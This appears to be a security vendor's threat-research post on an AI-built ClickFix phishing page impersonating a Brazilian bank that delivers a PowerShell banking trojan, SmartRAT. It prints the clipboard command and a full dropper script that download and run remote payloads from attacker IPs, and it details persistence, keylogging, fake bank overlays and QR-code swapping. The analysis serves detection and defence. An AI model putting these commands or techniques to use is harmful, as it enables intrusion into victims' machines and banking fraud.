ClickFix Campaign Generated Via AI Delivers SmartRAT

Introduction

In March 2026, Zscaler ThreatLabz observed multiple instances of typosquatting domains hosting malicious content generated with AI-powered website creation tools. Threat actors are leveraging website builders to create convincing lures quickly and at scale, with capabilities ranging from basic credential theft to a ClickFix campaign that delivers remote access trojans (RATs).

In this blog post, ThreatLabz examines a ClickFix campaign impersonating a Brazilian bank to deliver a PowerShell-based RAT, which ThreatLabz named SmartRAT. SmartRAT supports encrypted C2 communications, remote control (screen/keyboard/mouse), credential theft (keylogging and banking overlays), and persistence via scheduled tasks and a Windows service.

Update: Prior to our publication, Trend Micro wrote a blog post on this malware family that they dubbed Banana RAT with a different attack path.

Key Takeaways

• In March 2026, ThreatLabz observed threat actors using a webpage likely generated with AI to impersonate a Brazilian bank and a ClickFix lure (fake CAPTCHA followed by a fullscreen fake BSOD/system recovery prompt) to pressure victims into running a PowerShell command that downloads and executes a RAT that ThreatLabz dubbed SmartRAT.
• SmartRAT is a PowerShell-based banking RAT used for remote access and financial data theft (for example, fake bank-branded password forms, keylogging, and QR code interception).
• ThreatLabz discovered a flaw in the AI-generated C2 panel that can be used to bypass authentication.

AI Generated ClickFix Campaign Impersonating a Brazilian Bank

ThreatLabz uncovered an AI-generated website impersonating a popular Brazilian bank that uses a ClickFix technique to deliver the PowerShell-based SmartRAT. The following figure shows the entire ClickFix infection chain.

Figure 1: AI generated ClickFix campaign attack chain.

During our analysis, we discovered the typosquatting domain cartaobb[.]com impersonating the bank’s official domain cartaobrb[.]com[.]br. The fraudulent page is shown in the figure below.

Figure 2: Fake website impersonating a Brazilian bank using a ClickFix lure.

The fraudulent page advertises a credit card application and presents a fake Cloudflare CAPTCHA, mimicking a legitimate security check that a victim may encounter when logging into a legitimate banking platform.

Our analysis of the fraudulent page’s source code reveals several code comments that appear to be generated by an AI tool. Specifically, we noticed generic section header comments with a templated structure commonly seen in AI-generated webpages where the AI tool labels all sections so that the developer can easily understand and continue further integration. The header comments can be seen in the example below. 

As we further analyzed the source code, ThreatLabz observed anti-inspection measures intended to hinder inspection. The script disables common keyboard shortcuts for opening DevTools/Console/Inspector and viewing the page source by intercepting keydown events in the capture phase and invoking preventDefault() and stopPropagation() to suppress those actions. Every 3 seconds, the script also logs a crafted Image object whose getter triggers console.clear(), repeatedly wiping the console while DevTools is open. 

After the victim clicks the fake CAPTCHA, the script copies the ClickFix command to the clipboard, puts the browser into fullscreen mode, and displays a fake Blue Screen of Death (BSOD) “system recovery” page as shown in the figure below.

Figure 3: Fake BSOD message used to convince a victim into executing malicious PowerShell commands.

A “lockdown” routine is triggered with the fake BSOD to keep the victim trapped in the tab/window, restrict keyboard input, and enforce fullscreen mode. The lockdown routine first tries navigator.keyboard.lock(), then registers a capture-phase keydown handler that blocks most keystrokes while temporarily allowing Win+R, Ctrl+V, and Enter to support the ClickFix flow. It listens for window.blur and repeatedly calls window.focus() to regain focus if the victim switches away. To enforce fullscreen, it checks the fullscreen state every 50 ms and invokes requestFullscreen, falling back to vendor-prefixed methods (webkitRequestFullscreen/mozRequestFullScreen) when needed. There is a random number of trailing spaces added to the PowerShell command, likely to bloat the payload and/or evade detection since even a single added space changes the hash value.

Payload delivery

The following PowerShell command is copied to the clipboard. If a user pastes it into the Windows run command, the command will download and execute the next stage by retrieving st.txt from 64[.]95[.]13[.]238 as shown below. 

powershell "$k8='http://64[.]95[.]13[.]238/st.txt';iex(irm $k8)"   

The retrieved st.txt functions as a stealth PowerShell dropper. It uses Windows API calls to hide its console window, downloads a payload from a hardcoded IP, saves it as a decoy text file (msedge.txt), and immediately executes it as a script block, as shown below.

Add-Type -Name W -Namespace H -MemberDefinition '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr h,int c);[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();' -EA 0
[H.W]::ShowWindow([H.W]::GetConsoleWindow(),0)
$f='C:\Users\Public\Documents\msedge.txt'
$d=Split-Path $f
if(!(Test-Path $d)){md $d -Force|Out-Null}
(New-Object Net.WebClient).DownloadFile('http://64.95.13.238/payload.php',$f)
& ([ScriptBlock]::Create((gc $f -Raw))) -ScriptPath $f

The st.txt also downloads payload.php which contains another PowerShell script. This script suppresses errors, decodes hardcoded Base64 strings to retrieve an AES key and IV pair, decrypts an AES-CBC encrypted blob, and executes it using ScriptBlock::Create(). The decrypted blob is a PowerShell RAT that ThreatLabz named SmartRAT. 

SmartRAT Analysis

SmartRAT is a Brazil-focused banking RAT implemented entirely in PowerShell and identified by the embedded string SMART_V25. Its primary objective is remote access and financial data theft through capabilities such as fake bank-branded password forms, keylogging, and QR code interception.

Setup and configuration

SmartRAT decrypts two C2 server configurations. The first is decrypted using XOR with the key 2, resolving to c[.]windowsupdate-cdn[.]com. The fallback C2 is an IP address that is decrypted using XOR with the key 233, resolving to 162[.]141[.]111[.]227. The malware uses the port number 51888 for communication. SmartRAT also hides the running PowerShell window using user32.dll’s ShowWindow function.

Debug logs are written to C:\ProgramData or %APPDATA%\Microsoft\Diagnosis\ETW\client_debug.log, with a fallback to %TEMP%\client_debug.log. A per-process log is also created at C:\ProgramData\Microsoft\Diagnosis\ETW\process_<PID>.log to silently record all RAT activity.

SmartRAT generates a unique identity token by hashing (SHA-256) the machine GUID, MAC address, UTC ticks, a newly generated GUID, and the computer name. It stores this token in etw.dat and install.token. 

SmartRAT then computes an HMAC-SHA256 of this token value using a hardcoded master key (iuhbdaubdvauygd5562$3@##$r). The hardcoded master key is used for two distinct purposes: the HMAC operation uses the raw UTF-8 bytes of the master key plaintext as its secret, while the 32-byte AES encryption key is derived from the SHA-256 hash of the same string. The encryption and decryption of C2 command traffic is handled by the following two functions, respectively:

• Initialize-xVxIaX (encrypt): Uses AES-CBC to encrypt plaintext. It generates a fresh IV on each call via $aes.GenerateIV(), ensuring identical plaintext produces different ciphertext. The IV and ciphertext are each hex-encoded separately and returned as a colon-delimited string (<ivHex>:<ciphertextHex>) for transmission.
• Start-LXqXSB (decrypt): Splits the colon-delimited input into IV and ciphertext, hex-decodes both, and decrypts the payload using the same AES key to recover the plaintext command.

Persistence and privilege strategy

SmartRAT checks its privilege level by comparing the current Windows identity's SID against S-1-5-18 (the well-known LocalSystem SID), or by checking whether it was launched with the -ServiceMode flag. If either condition is true, SmartRAT connects to the C2 immediately. Otherwise, the code performs the following steps:

1. Copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt.
2. Attempts to establish persistence by creating a logon-triggered scheduled task named MicrosoftEdgeUpdateCore. If task creation fails, it falls back to registry-based persistence by writing a MicrosoftEdgeUpdateCore value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run that launches a PowerShell command to re-execute SmartRAT (msedgeupdate.txt) at each user logon.
3. Prompts for User Account Control (UAC) elevation.
   1. If UAC elevation is approved: SmartRAT compiles inline C# service code using csc.exe and installs a Windows service named MicrosoftEdgeUpdateCore under %ProgramData%\Microsoft\Diagnosis\ETW\. This service is configured to run with System privileges. After the SmartRAT PowerShell process is created, the code creates a watchdog that checks every 5 seconds to ensure it continues to run. Otherwise, the watchdog relaunches SmartRAT.
   2. If UAC elevation is denied: No Windows service is created. Instead, SmartRAT launches a hidden PowerShell process that bypasses the UAC logic and beacons to the C2. The scheduled task (if created) will prompt for UAC elevation again at the next logon.

SmartRAT also compiles another C# component that uses DuplicateTokenEx and CreateProcessAsUser to spawn a new PowerShell process using the current user’s session, even when the RAT is running as SYSTEM.

SmartRAT supports multiple command-line parameters that control service installation, removal, persistence cleanup, and how the malware runs. The table below lists the parameters that are supported.

Table 1: Command-line parameters supported by SmartRAT. 

SmartRAT outputs the string SMART_V25 along with the current timestamp as a simple confirmation that the RAT executed successfully.

Operator capabilities and victim interaction

Before connecting to the C2, the following C# classes (which are embedded in SmartRAT’s PowerShell code) are compiled and loaded into memory:

• NativeInput: Handles mouse and keyboard inputs, including freezing the victim's input.
• WinEUpjgHelper: Captures the screen using BitBlt (GDI). This class is compiled into memory, but never invoked at runtime. The active screen capture path uses System.Drawing.Graphics.CopyFromScreen().
• WindowMonitor: Retrieves the foreground window title and process name.
• InputTracker: A high-priority keylogger that monitors all keystrokes.
• IdleDetector: Tracks user inactivity using GetLastInputInfo.
• QRDetector: Detects QR codes using pixel pattern analysis.
• DisplayOverlay: Renders full-screen fake overlays, including Windows Update, BSOD, and bank-branded security screens for major Brazilian banks.
• QROverlay: Displays fake overlays with bank branding.

Monitor enumeration 

To map a victim’s screen coordinates and resolution, SmartRAT enumerates all screens and collects each display's full boundaries (X, Y, width, height). It calls SetProcessDpiAwareness (shcore.dll) to bypass DPI scaling and obtain true physical pixel values, then stores the results in a global array so the operator can select a monitor index and accurately align overlays and screen captures.

SmartRAT also tracks banking activity using a window title watchlist, shown in the table below:

Table 2: Window-title keywords SmartRAT monitors to detect banking, payment, and cryptocurrency-related activity.

If the window title matches a list of predefined targets, SmartRAT logs the title, matched keyword, process name, and timestamp, and sends this information to the SmartRAT C2 server as a BrowserAlert (message type 0x80). This serves as a tipoff to the operator that the victim is interacting with a financial application.

Acting on this alert, the operator can then issue a dataEntry: command containing bank-specific branding parameters (name, color palette, prompt text, input length). This SmartRAT feature can be used to launch a full-screen overlay such as a bank verification prompt as shown in the figure below.

Figure 4: Example of fake overlay which can be shown to its victims.

The information captured in the overlay form is then exfiltrated to the SmartRAT C2.

Post-infection / infrastructure weakness

SmartRAT attempts to connect to its C2 server indefinitely. If domain resolution fails, it falls back to a hardcoded IP address. Once a connection is established, SmartRAT communicates over a raw TCP socket on port 51888. Each message uses the binary framing represented in the figure below:

Figure 5: SmartRAT C2 message format.

During connection attempts and initial setup, SmartRAT sends the message types shown in the table below.

Table 3: SmartRAT C2 message types.

SmartRAT features 

After connecting, SmartRAT enters a continuous loop and performs the following high-level tasks:

• Idle detection: Pauses screen capture after > 20 minutes of inactivity and resumes on user activity.
• Incoming packet processing: Processes up to 20 C2 packets per main loop iteration.

The table below shows the C2 messages handled by SmartRAT:

Table 4: Smart SmartRAT C2 commands.

SmartRAT also supports the following features:

• Automatic screen streaming: Captures and streams screenshots to the operator at configurable intervals. The default interval is set to 12 milliseconds.
• QR auto-detection: Identifies QR codes on banking sites and sends QR information to the C2 (supports QR-swap workflows).
  • When QR auto-detection is enabled by the C2 via the AutoQRToggle (0x64) command, the client scans all connected monitors every 3 seconds using a heuristic pixel-contrast and clustering algorithm to locate QR-code-shaped regions on screen. Upon detection, it captures the full monitor as a JPEG, computes the QR's bounding box coordinates, and transmits them to the C2 via the QRCodeDetected (0x65) packet, including the screenshot, region coordinates (X/Y/W/H), monitor offset, and a deduplication hash.
  • In QR-swap workflows, the C2 performs the actual QR decoding server-side and can then respond with a ShowQROverlay (0x66) command containing a threat actor-supplied QR image, which the client renders as a borderless TopMost window positioned at the exact pixel coordinates of the original QR, effectively swapping the legitimate banking QR with the threat actor's, so the victim unknowingly scans and authorizes a fraudulent transaction. The overlay persists until dismissed via HideQROverlay (0x67), and failed-decode regions are blacklisted for 30–60 seconds to avoid redundant transmissions.
• Keylogger streaming: Continuously uploads the victim’s keystrokes to the C2.

SmartRAT is managed from a web-based C2 panel as shown in the figure below.

Figure 6: SmartRAT C2 panel.

Based on verbose explanatory comments and frequent emoticons, the panel’s page source suggests the use of AI tools during development. More importantly, the panel contained critical authentication weaknesses that exposed its C2 functionality, consistent with code deployed without adequate security review. Further inspection revealed that the panel’s “authentication” logic relied only on the presence of two localStorage values (authToken and currentUser) to hide the login overlay. There was no server-side validation of these values before granting access to the panel UI.

<body>
 <!-- Script inline para evitar flash da tela de login -->
 <script>
   if (localStorage.getItem('authToken') && localStorage.getItem('currentUser')) 
{
           document.write('<style>#loginOverlay{display:none!important}</style>');
       }
 </script>
 <!-- 🔐 TELA DE LOGIN -->
 <div class="login-overlay" id="loginOverlay">
   <div class="login-container">
     <div class="login-logo">
       <img src="images/logo-samurai.jpg" alt="Logo">
       <h1>MyGood PRO</h1>
       <p>Sistema de Acesso Remoto</p>

Because the check is performed entirely client-side, a user could bypass the login screen by setting arbitrary values for authToken and currentUser in the browser’s localStorage. The figure below shows the panel, including the sidebar populated with threat actor-controlled values.

Figure 7: SmartRAT C2 panel administration page.

Conclusion

The rise of AI-powered website builders is enabling cybercriminals to generate fraudulent web pages quickly with high-fidelity visuals and at scale. In this case, threat actors used a website builder to create a fake page impersonating a popular Brazilian bank and employed the ClickFix technique to deploy SmartRAT on the victim’s system, enabling remote access and data theft. The growing availability of AI-driven tools will continue to shape the threat landscape by expanding capabilities for both cybercriminals and security defenders.

Zscaler Coverage

The figure below illustrates the Zscaler Cloud Sandbox, showcasing detection details for SmartRAT.

Figure 8: Zscaler Sandbox Report for SmartRAT.

In addition to sandbox detections, Zscaler’s multilayered cloud security platform identifies indicators related to this campaign under the following threat names:

• PS.RAT.SmartRAT
• HTML.Phish.Typosquat.RC.M.TS

Indicators Of Compromise (IOCs)

MITRE ATT&CK Framework